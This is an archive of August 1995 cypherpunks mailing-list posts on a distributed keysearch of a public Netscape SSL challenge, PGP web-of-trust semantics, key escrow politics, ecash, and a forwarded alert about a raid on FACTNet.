From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@l0pht.com>
Date: Tue, 22 Aug 95 09:56:33 PDT
To: cypherpunks@toad.com
Subject: Returned mail: unknown mailer error 126
Message-ID: <199508221645.MAA24957@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 22 Aug 1995 12:45:26 -0400
from localhost [127.0.0.1]

   ----- The following addresses had delivery problems -----
"|/home/gheap/\+\ \+\ \# -vo /home/gheap/.elm/gheapfilter.log"  (unrecoverable error)
    (expanded from: gheap)

   ----- Transcript of session follows -----
sh: /home/gheap/+: No such file or directory
554 "|/home/gheap/\+\ \+\ \# -vo /home/gheap/.elm/gheapfilter.log"... unknown mailer error 126

   ----- Original message follows -----


To: cypherpunks@toad.com
From: cypherpunks@toad.com
Date: Tue, 22 Aug 1995 12:45:26 -0400

blah




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Tue, 22 Aug 95 09:56:38 PDT
To: poodge@econ.Berkeley.EDU (Sam Quigley)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508221626.JAA10063@quesnay.Berkeley.EDU>
Message-ID: <199508221656.MAA14641@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue Aug 22 12:26:49 1995: you scribbled...
> 
> 
> [stuff about running crypto screensavers]
> 
> It seems like there's got to be an easy way to divvy up keyspace on a
> real time basis so that anyone with a few cycles to spare can
> contribute them...
> 
> There could be a central server out there, which would keep track of
> what keyspace needs to be swept, etc.

It seems that the SKSP protocol is a good foundation for just such a plan.

Can screensavers such as After Dark for mac/pc access network protocols?  
or would someone have to write a new screensaver alltogether.

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 22 Aug 95 11:25:11 PDT
To: cypherpunks@toad.com
Subject: Re: Partial Key Escrow
Message-ID: <199508221820.OAA26418@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Lyle Seaman <lws+@transarc.com> wrote:

<snip>

>The domestic TLA can't afford to embark on massive, wholesale fixing
>expeditions this way, even _with_ the escrowed part.  The point is to
>fix the unescrowed part at such a size that they can afford to crack a
>limited number of keys in a reasonable interval.  Say, at a cost of
>about $10000 / key.  That's peanuts for an OKBomb or WTC bomb case,
>but it gets to be expensive (hard to hide the expense) if you're
>fishing for dirt on members of the opposition party,...

The problem for THIS member of an opposition party is that the
percentage of the U.S. budget comprising "Black" (secret, "off
the books" usually mil./intelligence) programs grows yearly,
like inflation. At the same time, the speed of chips increases
like the national debt and their cost goes down steadily, (see
Robert Hettinga's post titled, "e$: The Book-Entry/Certificate
Distinction" describing Moore's law). These trends, (IMO) bode
ill for my long-term personal (and political!) privacy, unless
the freedom of those of you able to "write code"(tm) implement-
ing my privacy is unfettered. Anything that reacts as slowly to
the marketplace as the government does will constantly be play-
ing catch-up. Others may disagree, depending on your individual
level of trust in the present government.

<snip>

...

On a different, and sad, note...Phil Zimmermann's mom recently
passed away. I encourage all of you to make a donation in her
name to his legal defense fund, and (if religious) to include
her in your prayers.
Peace.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDofYm1lp8bpvW01AQEoPQP+JiQHUke0Q/nDdXgt9NIMPbePp5T8dqyn
YL5TdWchPCqZ+aaBfbO20/dLADz/C8L7zq88bLLsUaVWr8tArlZPh2keQvOVUWvd
PD+/Ky4HsRn7BJaBuc5187gvAtqyvWGAHpYJQ/QilC7cUqDmbCiuBHCD2rsSyj1E
XX2Cl1tBnd8=
=L5O9
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDof2SoZzwIn1bdtAQGacwGAmM50nkIDJvU6i8PApdwtZ5oG1vIN7Nv0
zLZloPP4+6FR3R9vkYun5Ptq7yEARTqU
=UuAX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 22 Aug 95 13:43:17 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508221446.KAA00931@skyclad.lcs.mit.edu>
Message-ID: <199508222043.OAA17349@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> Key signatures exist for one reason and one reason only: To thwart
> man-in-the-middle attacks.  Whether your "persistent persona" is a
> True Name (tm) or a pseudonym is irrelevant.

<snip>

> Zimmermann clearly understood all of this, but I don't think he
> documented it properly.  In my opinion, everyone should always think
> in terms of man-in-the-middle attacks when signing a public key.
> Mandating "True Names" is just an overconservative approach suitable
> for people who don't fully understand the issue.


My point exactly.  My post "Stop Fixating on True Names" was an attempt to
clarify things to said people.


Look at it this way:  leaving aside the fact that a Man-In-The-Middle has to
do a little more fast footwork than a normal old eavesdropper does, public
key cryptography does not actually give you *any* advantage over symmetric-key
cryptography except for this one fact:


You can ask George what Alice's public key is, but you can't ask him what
her-and-your shared (symmetric) secret key is!


- From this perspective, the Web of Trust is the soul of public-key
cryptography.  From the other perspective ("Never ever sign a key which you
got off of a bulletin board!" warns "pgpdoc1.txt") it is a cute anachronism.


By the way, you mentioned "people who don't fully understand the issue"--
a brief survey of e-mail and posts I have seen on this subject indicates to
me that even knowledgeable people like the cypherpunks are about evenly split
on whether they appreciate this concept or not.


[note:  I've been cc:'ing messages to c'punks accidentally after I upgraded
to mh.  My apologies.  At least they weren't completely without
relevance...]


Bryce
Announcement: I have had technical difficulties.  If you sent me e-mail
between Aug 5 and Aug 20 and didn't receive a response, please re-send.
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDpBPfWZSllhfG25AQFvuAP/a6vSu4OgkDAXTRWif46/chb1+Owo2TBx
YEWSzp4PRYTL1ZwrC1eOtx37miGUzvsGooXOEPfEpC4oW3f0Jg6BHanXabhegJyb
t09m8IlaeD38IKATnzcC7VeeU0sWuWUea1vFJw28oZv0VOgGSeeFcYE4DA/oOtRD
oqTFfG+GM7w=
=LFIz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Tue, 22 Aug 95 15:07:56 PDT
To: cypherpunks@toad.com
Subject: URGENT ANOTHER SCIENTOLOGY RAID: FACTNET
Message-ID: <199508222202.PAA23454@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


FORWARDED FROM: alt.religion.scientology

Believe it or not, Co$ has just struck again!

I just talked with Lawrence Wollersheim of FACTNet in Golden, Colorado. As
I type (10:20 a.m. PDT), Federal marshals are looking on as Co$ goons grab
all of FACTNet's computers, records, archives, and on and on.

Look for more information shortly.

Please post this EVERYWHERE. Get the word out!

--------------------------------------------------------

A special note to T.C. May:

These are nice people, eh. Three raids for posting unsealed court 
documents. Get a clue Tim!
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 22 Aug 95 12:11:19 PDT
To: cypherpunks@toad.com
Subject: Re: NEXT CHALLENGE: so, when does it start?
Message-ID: <9508221911.AA16633@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I've got the program, and I'm ready to start sweeping
(about 35,600 keys/sec on a P5  90 Mhz NT machine - have to see
how many I can draft for this) - I even compiled for Win 3.11 (less
than 800 keys/sec on a 486/33 - don't think I'll bother).

I've got the challenge file from Adam's messages.

But when do we start? Have we started already? Have we completed?

It's difficult to tell. There was talk of starting at 12:00GMT (about 6 
AM here on the east coast), but there was no 'start now' message to 
the list. At Adam's site, I can see that 'project 11fa' has been 
completed, but the key (000000001234) looks like test data.

If I try to allocate keys, I get the 600 SLEEP 3600 message, which
suggests strongly  that the seach has not started yet.

Adam, when you fix a time to start the search, could you:

1. Send a message to the list, clearly saying so, and giving the 
time.

2. Put a <h1>headline</h1> in your page saying it's underway?

Thanks.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 22 Aug 95 17:44:17 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Third World Man
Message-ID: <8AFA46B.0003000359.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> When a certain character in a television show referred to "Third World
TC> mutants," he was also referring to "your basic brown types." (His words,
TC> not mine. Ten credits to anyone who can identify the t.v. show and the
TC> character.)

  "Hill Street Blues", Lt. Howard Hunter.

TC> The term "Fourth World" has in the last 20 years come to refer to the
TC> countries which are so impoverished as to be almost hopeless. Bangla Desh
TC> is the canonical Fourth World nation.

  Cyberia is the "Fifth World", akin to the "Fifth Dimension". Let the
sun shine....


 * I love my country.
 * I fear my government.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 18:24:16 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Third World Man
Message-ID: <ac5fd1e2240210040198@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 8/22/95, MONTY HARDER wrote:
>TC> When a certain character in a television show referred to "Third World
>TC> mutants," he was also referring to "your basic brown types." (His words,
>TC> not mine. Ten credits to anyone who can identify the t.v. show and the
>TC> character.)
>
>  "Hill Street Blues", Lt. Howard Hunter.

Congratulations!

Two other people said "Archie Bunker"/"All in the Family." A good guess,
but it was indeed Howard.

>TC> The term "Fourth World" has in the last 20 years come to refer to the
>TC> countries which are so impoverished as to be almost hopeless. Bangla Desh
>TC> is the canonical Fourth World nation.
>
>  Cyberia is the "Fifth World", akin to the "Fifth Dimension". Let the
>sun shine....

The dawning of the age of Aquarius?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@eiffel.lcs.mit.edu>
Date: Tue, 22 Aug 95 16:17:39 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508221446.KAA00931@skyclad.lcs.mit.edu>
Message-ID: <199508222317.TAA09558@eiffel.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 >> Zimmermann clearly understood all of this, but I don't think he
 >> documented it properly.  In my opinion, everyone should always
 >> think in terms of man-in-the-middle attacks when signing a public
 >> key.  Mandating "True Names" is just an overconservative approach
 >> suitable for people who don't fully understand the issue.

 wilcoxb> My point exactly.  My post "Stop Fixating on True Names" was
 wilcoxb> an attempt to clarify things to said people.

Then you didn't clarify very well; to wit:

 wilcoxb> Okay now does anyone want to do any of the above two things
 wilcoxb> to me?  If not then *don't* *worry* about whether my public
 wilcoxb> key is signed by anyone or not.  It makes zero difference to
 wilcoxb> you until such a time as one of the above motivations
 wilcoxb> acquires.

 wilcoxb> Zimmermann et al. were/are naive to emphasize the Web of
 wilcoxb> Trust as a means of introducing strangers.

The first paragraph clarifies nothing because it is dead wrong; the
second because it is arrogant, offensive, and dead wrong.

 wilcoxb> From this perspective, the Web of Trust is the soul of
 wilcoxb> public-key cryptography.  From the other perspective ("Never
 wilcoxb> ever sign a key which you got off of a bulletin board!"
 wilcoxb> warns "pgpdoc1.txt") it is a cute anachronism.

The Web of Trust is a means of thwarting active attacks;
nothing more, nothing less.  "Perspective" has nothing to do with it.

Given that active attacks are hard to explain and understand fully,
the PGP docs are correct to advocate a conservative approach to
signing keys.  Novices *should* be taught to take the Web of Trust
seriously.  (Yes, I am retracting my own statements quoted above; the
more I think about it, the more I think it is very hard to teach a
novice the details of active attacks.)

Moreover, I suspect that active attacks are more likely today than
when those docs were written, which makes their advice precisely the
opposite of an "anachronism".

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDpleHr7ES8bepftAQE0KgQAoAg5QeXwbtZzKMliNH63f3Ewvxz1g8gR
vlTPwZ8YRWANxFFbhN03DMo6HQI78f/8VnbvOB8osZz/aLQgmyuw6Q201vfHbbtu
gKpfLBPLu/Cl2JEk6FK58IYyvrTPZ7XKfp80LoRIby/pSU2uL7K2+7vfjGWGvjvY
V9s9mJUCGN8=
=OBD5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 11:52:46 PDT
To: ecm@ai.mit.edu
Subject: C$ prize for bruting Hal's next challenge?
Message-ID: <1792.9508221850@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



It has been suggested to me that we might like to add a fun incentive
to the bruting of Hal's 2nd SSL challenge as posted to cypherpunks on
Aug 19th.

To this end we need some c$ for the pot!

I'll be collecting donations for the pot and vouch that every c$ cent
handed over will be handed to the person who hits the key.

The only reciever of the jackpot for hitting the key, will be
encouraged to cash it in on the ecm mailing list / ecash market WWW

	ecm@ai.mit.edu, http://www.c2.org/~mark/ecash/ecash.html

so that currency is not taken out of circulation, and to help boost
the flow of c$ for the ecash market, as there appears to be a shortage
of e$ sellers.

For info on joining in the lottery for a chance to win your c$ back
and then some, or just to win other peoples c$, take a look at:

	http://www.brute.cl.cam.ac.uk/brute/

The challenge has not started yet, that will probably not be for a day
or two yet, so you've got time to get the software, check that it
works etc.

Then stand by... for "the ready, steady, go!".

The reason for the start line affair is that for demonstrational
reasons this attempt is designed to show how quickly a Netscape SSL
session can be cracked.

There is a WWW interface to getting key space for those behind
firewalls or without direct IP.

I hereby donate c$ 50 to the pot, mail me your c$.  (It won't be a
good idea if you post your c$ to the lists, as the first person to
cash it gets it, you need to do it in private email, PGP it even).  To
generate your payment either save it to a file, or email directly to
me via the digicash client, click on the icon which looks like a note
(is that what it's supposed to be? the one next to the bank symbol),
then choose to send via file / email toggle make payment, enter the
amount (leave the shop account ID blank, give a payment description if
you like).

Adam

[btw is there still something wrong with toad.com? traffic seems
exceptionally light...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Date: Wed, 23 Aug 95 00:22:05 PDT
Subject: CypherRant: Reasons why private cryptography should not be regulated.
Message-ID: <303ac1bd.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

CypherRant: Reasons why private cryptography should not be regulated.

Paul Elliott is solely responsible for this document.
Please distribute widely.


FBI director Freeh has been going around pushing his stupid plans
for cryptography regulation. Usually, these plans take the form of
some kind of mandatory key escrow. Mandatory key escrow schemes
are requirements that encryption keys be given to government agencies
with the promise that the keys will not be used without a warrant.

Now let me give some reasons why Freeh's requests should be ignored.

1) It is unconstitutional!
	a) First amendment. Electronic communications are a form
                of speech and the cryptography regulations try to regulate
                this speech to a form the government understands.
                Congress shall make  NO LAW ....or abridging the
		freedom of speech or of the press; ... 
		They really meant it!
	b) Second amendment. Cryptography is arms. Even U.S.
                government ITAR regulations admit this. Therefore
                cryptography is protected by Second amendment.
	c) Ninth & tenth amendments. Article I section 8 does not
                give congress the power to tell us what computer
                software we can run on our computers. Therefore
                that power remains with us, and we should be able
                to run whatever cryptography software we want the 
                displeasure of congress not withstanding.

	d) The power to search, if a warrant exists, which is mentioned by
		the fourth amendment, does not grant the government the 
		right to succeed in finding what the it is looking for. 
		In other words the power to search, is not a power to 
		guarantee a successful search. It is not a power to 
		require citizens to run their lives in such a manner 
		that any government search will be successful. For 
		more information on this, see the following World Wide 
		Web url: http://www.clark.net/pub/cme/html/avss.html

Since all Senators and Congressmen take an oath to preserve and defend
the constitution of the U.S., this should be the end of the argument.
However, watching some of the stupid laws that have come out of congress
in past years, tells me I should supplement the above with additional
argument.

I am not a lawyer and I am not trying to be one. I have no opinion as to
whether private cryptography regulations will be found unconstitutional.
There are a number of cases where out courts have made decisions which
do great violence to the plain meaning of the text of our constitution.
Knowing what the courts will actually do is the business of lawyers.
Understanding the constitution so that one may know what the courts 
should do should be the business of every citizen.

2) The excellent NRA argument "when guns are outlawed only outlaws
will have guns" applies with equal force to cryptography! Professional
criminals will circumvent with ease any government regulations on
cryptography. Billions of bytes travel the internet yearly. The techniques
of steganography make it absolutely trivial for any motivated person to 
conceal any encrypted messages. The Big Brother cryptography regulations
will affect only ordinary citizens.

3) Cryptography is already in use by legitimate business. Any government
regulation of cryptography will probably cost huge amounts of money for
software and hardware costs for existing systems to be changed to a form
that the government approves. The existing ITAR regulations probably
cost the U.S. economy large amounts of money because U.S. companies can
not market cryptography software internationally. By discouraging
private cryptography, the ITAR regulations probably enables a large
amount of computer crime since it makes it difficult for people to
protect themselves. The ITAR regulations have not and can not prevented
strong cryptography from making it outside  the U.S. How many tons of
cocaine illegally enter the U.S. every year? Yet the government ITAR
regulations propose to regulate the export of software that can fit in a
shirt pocket, or travel by wire concealed with  billions of bytes of
data that leave the U.S. every year. It is time for the U.S. government
to start living in the real world!

According to an article in the August 17, 1995 Wall Street Journal, ITAR
regulations have required Netscape to use inferior encryption methods in
the international version of its World Wide WeB browser software. This
inferior encryption method has actually been broken by a French Hacker!
Because of its computational intensity, this weakness in the encryption
method does not represent an immediate danger. However as more powerful
computers continue to develop, this and similar vulnerabilities will
present a danger for those who wish to use the internet for commerce.

4) These regulations make it impossible for an individual to have
greater privacy than the U.S. government. The Adlrich Ames case makes it
clear that the U.S. is incompetent to keep a secret. 

5) The proposed regulations require the American people trust the
government, but on the contrary, the government should be required to
trust the American people. Recent news stories (Waco ect.) make  it
clear that it is common for government agents to lie to get a search 
warrants. Government should be viewed as George Washington did as  "a
fearful servant and a dangerous master".

A recent poll conducted by the Americans Talk Issue Foundation said 76%
of the people questioned responded that they rarely or never trust
"government to do what is right". This mistrust is well founded.  At the
same time as administration sources were saying that key escrow schemes
would remain voluntary, FBI, NSA, and DOJ experts were saying that the
schemes must be made mandatory if they were to be at all effective. If
the government is willing to lie to establish a key escrow key system,
what makes us believe that the government will not lie when applying for
warrants to use that system?


6) It is too humiliating to require a free people to participate in the
establishment of their own surveillance prisons. This is  what key
escrow requires. Consider the words of our revolutionary heritage:

	Those who would sacrifice essential freedoms for temporary safety
	deserve neither. Benjamin Franklin

	If ye love wealth greater than liberty, the tranquility of servitude
	greater than the animating contest for freedom, go home from us in
	peace.  We seek not your counsel, nor your arms.  Crouch down and 
	lick the hand that feeds you; and may posterity forget that ye 
	were our countrymen. Samuel Adams
 
Do you think that these men would approve the government's key escrow
requests?

This information can also be found at the following url:
http://www.efh.org/pgp/rant.html
- --
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMDpEYfBUQYbUhJh5AQHMtgP9HbCfKge22z/4jFi2MKLXqWkYB4vkIFsJ
43J7zdoDIRbfOeoMBNCFOGeIHGQ5TGL1+VFVhRMrzTZEPs/dciqc81O0YlnhiiIR
L7Lz06Jlzg2xLtaeaTQjrGewKTT9LeWXpqFSWtpe0xxAqaZ/11ompTAHm0A6NxhU
r4QXaBaEzfg=
=Axac
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 22 Aug 95 20:41:42 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v01520d06ac6060379f25@[199.171.88.71]>
MIME-Version: 1.0
Content-Type: text/plain


>At 2:30 AM 8/22/95, Timothy C. May wrote:
>> (An important point is that
>>in a cash economy, identity is almost irrelevant. It's only in non-cash, or
>>"account-based," economy that True Names are demanded. Lots of interesting
>>issues to discuss here, which I won't now.)

[Lots of interesting discussion deleted]

>Everyone trusts their transactions because of the difficulty of forging
>certificates.  That means that once again, a certificate has it's own
>inherent worth. It speaks for itself, and when it changes hands, the trade
>is, as Eric Hughes says, "immediately and finally" cleared and settled.
>The overhead of keeping books is gone, at least for the trading parties,
>and especially for the clearing houses, who, like exchanges, just kind of
>disappear, along with any way to regulate them.  Somewhere, Joe Kennedy,
>the first Chairman of the Securities and Exchange Comission, is probably
>either crying his eyes out or laughing his head off, depending on your
>interpretation of his role in regulatory history.

In such a system, where does credit come in? If I have a certificate that
is worth X, then does the recipient know that it's from my "credit card"?
How do I obtain credit, and in what form does it exist?

Furthermore, how do we assess the value of real physical things in a system
like this?


--
Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 12:50:08 PDT
To: trei@process.com ("Peter Trei")
Subject: Re: NEXT CHALLENGE: so, when does it start?
Message-ID: <2084.9508221946@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Well, I've got the program, and I'm ready to start sweeping
> (about 35,600 keys/sec on a P5  90 Mhz NT machine - have to see
> how many I can draft for this) - I even compiled for Win 3.11 (less
> than 800 keys/sec on a 486/33 - don't think I'll bother).
> 
> I've got the challenge file from Adam's messages.
> 
> But when do we start? Have we started already? Have we completed?

Soon.  No.  And not yet.

> It's difficult to tell. There was talk of starting at 12:00GMT (about 6 
> AM here on the east coast), but there was no 'start now' message to 
> the list. At Adam's site, I can see that 'project 11fa' has been 
> completed, but the key (000000001234) looks like test data.

Yes confusion abound.  Dead mailer for me, Piete away for a while
(back now).  Rest assured big announce of a deadline when it is fixed,
with plenty of warning.

Perhaps a start time of day which is more convenient would be better,
also for people using WWW, few likely to be around at 6AM, perhaps
later in the day, when the time is decided.

> If I try to allocate keys, I get the 600 SLEEP 3600 message, which
> suggests strongly  that the seach has not started yet.

Yes, correct.  For people with the unix client, this means they can
leave the client running already, and it will sleep in 1hr chunks,
until there is something on the server to do.

> Adam, when you fix a time to start the search, could you:
> 
> 1. Send a message to the list, clearly saying so, and giving the 
> time.

Okay will do.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 13:47:09 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: C$ prize for bruting Hal's next challenge?
Message-ID: <2307.9508222046@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> writes:
> > [me on donating to the c$ prize fund for Hal's 2nd challenge]
> I like the idea, but there are two problems with it:
> -Not all platfoms let you save e$ to a file. You got to open a shop.
> -Leaving the shop ID blank won't work. You got to use @ (wildcard) for shop
> ID to turn e$ into a bearer certificate.
>
> Get the shop going and I'll donate e$50

Okay, a quick email conversation with Mark Grant as to how one goes
about doing shops via cgi/www, and a brief bit of fiddling, and here
we are:

	http://dcs.ex.ac.uk/~aba/sslprize.html

Just click on amount to donate to the pot.  Pay in parts if the amount
you want isn't there (ie 15 c$ = 5 c$ + 10 c$).

cpunks + ecm folks + digicash enthousiasts, accepting your c$
donations now!

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 22 Aug 95 22:00:40 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508222317.TAA09558@eiffel.lcs.mit.edu>
Message-ID: <199508230500.XAA23861@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

patl> Zimmermann clearly understood all of this, but I don't think he
patl> documented it properly.  In my opinion, everyone should always
patl> think in terms of man-in-the-middle attacks when signing a public
patl> key.  Mandating "True Names" is just an overconservative approach
patl> suitable for people who don't fully understand the issue.

wilcoxb> My point exactly.  My post "Stop Fixating on True Names" was
wilcoxb> an attempt to clarify things to said people.

patl> Then you didn't clarify very well; to wit:

wilcoxb> Okay now does anyone want to do any of the above two things
wilcoxb> to me?  If not then *don't* *worry* about whether my public
wilcoxb> key is signed by anyone or not.  It makes zero difference to
wilcoxb> you until such a time as one of the above motivations
wilcoxb> acquires.


You are quite right that this paragraph was unclear.  I meant "don't worry
about whether my public key is signed where signing means certifying the
mapping between my key and my physical identity.", not "don't worry about 
whether my public key is signed where signing means certifying the mapping
between my key and a perceived identity of mine.".


It is unfortunate that a PGP key-signature has such ambiguous semantics, but
again it is my fault for being unclear above.


wilcoxb> Zimmermann et al. were/are naive to emphasize the Web of
wilcoxb> Trust as a means of introducing strangers.

patl> The first paragraph clarifies nothing because it is dead wrong; the
patl> second because it is arrogant, offensive, and dead wrong.


Pshaw.  I think it's funny when people gasp in horror if you say something
disrespectful of Saint Phil.


Here, I'll say it again:  Zimmermann was naive to emphasize the Web of
Trust as only legitimate for public key<->Real-Life-identity mappings.  In
the future such mappings will be rare, while the Web of Trust will be used
extensively for public key<->virtual-identity mappings.


(The alert observer will notice that I changed some things between the first
and second invocations of the Disrespectful Assertion.  This is because when
I wrote the first version I was still confused about the ambiguity between
"Web of Trust as set of key<->Real-Life-identity mappings" and "Web of Trust 
as set of key<->identity mappings".)


patl> Given that active attacks are hard to explain and understand fully,

I'll say!  I'm having a very hard time understanding all of this clearly.

patl> the PGP docs are correct to advocate a conservative approach to
patl> signing keys.  Novices *should* be taught to take the Web of Trust
patl> seriously.  (Yes, I am retracting my own statements quoted above; the
patl> more I think about it, the more I think it is very hard to teach a
patl> novice the details of active attacks.)


Be that as it may, I still think that Zimmermann assumed that
key<->real-life-identity mappings would be the primary purpose for the Web 
of Trust when he wrote "pgpdoc1.txt".  And I think he was wrong about that.
It is not "arrogant" or "offensive" to say that someone was wrong when you
believe that to be the case.


patl> Moreover, I suspect that active attacks are more likely today than
patl> when those docs were written, which makes their advice precisely the
patl> opposite of an "anachronism".


Furthermore, Phil's advice to only sign keys which you have physically 
verified actually makes it easier for an attacker to get In-The-Middle-Of you 
and me.  This is because there is no Web of physically-verified keysigs 
between you and me.  If Phil had recommended treating public keys as being 
equivalent to net.personas, and verifying them as such, (or better yet, had 
provided a certificate mechanism to do so in *addition* to the current 
certificates) then there would be a Web of non-physically-verified keys 
between you and me, which would be much harder for an attacker to subvert.


Since you and I do not share any such Web, we are not any better off than if
we were using symmetric-key cryptography, as far as privacy goes!
(Authentication is of course another matter.)


Ah, the irony.  By insisting on maximally-strong links between each node in
the Web, you generate a much weaker Web than if you allowed weaker individual
links in greater quantity.


Thank you for your correspondance, Patrick and others.  I look forward to
more constructive interaction.


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDq0kfWZSllhfG25AQERJAQAglcIqszrEeWmrbL1E/SxpdRK+3B8zKC9
g7H6fd6T6D8BnYv6u4wmlU+F8fyFT0V6cVa5BZ6Defmc6phvYD9wKyleuaYjRaOP
tVd8tITqpoIkmpK1+skCiV5CUl5eseKQJUlUa2LX4J8Lh9J6t9ZRm6p72ocJ88JL
hnOknxRHz/M=
=Pes4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 22 Aug 95 23:01:55 PDT
To: "J. Kent Hastings" <cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508230601.XAA02627@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 AM 8/21/95 -0800, J. Kent Hastings wrote:
>Doesn't quantum coherence require molecular precision if it
